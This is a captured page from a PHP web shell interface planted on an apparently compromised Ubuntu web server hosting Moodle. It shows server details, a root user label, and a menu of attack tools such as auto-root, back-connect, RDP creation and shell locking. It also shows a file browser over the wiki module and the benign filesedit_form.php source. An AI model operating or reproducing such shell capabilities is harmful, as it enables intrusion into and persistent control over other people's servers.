Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
mod /
wiki /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxr-x
classes
[ DIR ]
drwxrwxr-x
db
[ DIR ]
drwxrwxr-x
diff
[ DIR ]
drwxrwxr-x
editors
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
parser
[ DIR ]
drwxrwxr-x
pix
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
README
139
B
-rw-rw-r--
admin.php
4.24
KB
-rw-rw-r--
comments.php
2.49
KB
-rw-rw-r--
comments_form.php
1.43
KB
-rw-rw-r--
create.php
4.01
KB
-rw-rw-r--
create_form.php
3.68
KB
-rw-rw-r--
diff.php
2.92
KB
-rw-rw-r--
edit.php
4.1
KB
-rw-rw-r--
edit_form.php
5.21
KB
-rw-rw-r--
editcomments.php
2.36
KB
-rw-rw-r--
files.php
3.81
KB
-rw-rw-r--
filesedit.php
3.77
KB
-rw-rw-r--
filesedit_form.php
1.66
KB
-rw-rw-r--
history.php
2.69
KB
-rw-rw-r--
index.php
3.04
KB
-rw-rw-r--
instancecomments.php
3.27
KB
-rw-rw-r--
lib.php
29.18
KB
-rw-rw-r--
locallib.php
60.84
KB
-rw-rw-r--
lock.php
2.43
KB
-rw-rw-r--
map.php
2.66
KB
-rw-rw-r--
mod_form.php
4.29
KB
-rw-rw-r--
module.js
3.98
KB
-rw-rw-r--
overridelocks.php
2.47
KB
-rw-rw-r--
pagelib.php
95.72
KB
-rw-rw-r--
prettyview.php
2.29
KB
-rw-rw-r--
renderer.php
24.98
KB
-rw-rw-r--
restoreversion.php
2.49
KB
-rw-rw-r--
search.php
2.87
KB
-rw-rw-r--
styles.css
5.55
KB
-rw-rw-r--
upgrade.txt
643
B
-rw-rw-r--
version.php
1.46
KB
-rw-rw-r--
view.php
9.89
KB
-rw-rw-r--
viewversion.php
2.65
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filesedit_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Edit wiki files form * * @package mod_wiki * @copyright 2011 Dongsheng Cai <dongsheng@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); require_once("$CFG->libdir/formslib.php"); class mod_wiki_filesedit_form extends moodleform { protected function definition() { $mform = $this->_form; $data = $this->_customdata['data']; $options = $this->_customdata['options']; $mform->addElement('header', 'general', get_string('editfiles', 'wiki')); $mform->addElement('filemanager', 'files_filemanager', get_string('files'), null, $options); $mform->addElement('hidden', 'returnurl', $data->returnurl); $mform->setType('returnurl', PARAM_URL); $mform->addElement('hidden', 'subwiki', $data->subwikiid); $mform->setType('subwiki', PARAM_INT); $this->add_action_buttons(true, get_string('savechanges')); $this->set_data($data); } }
Close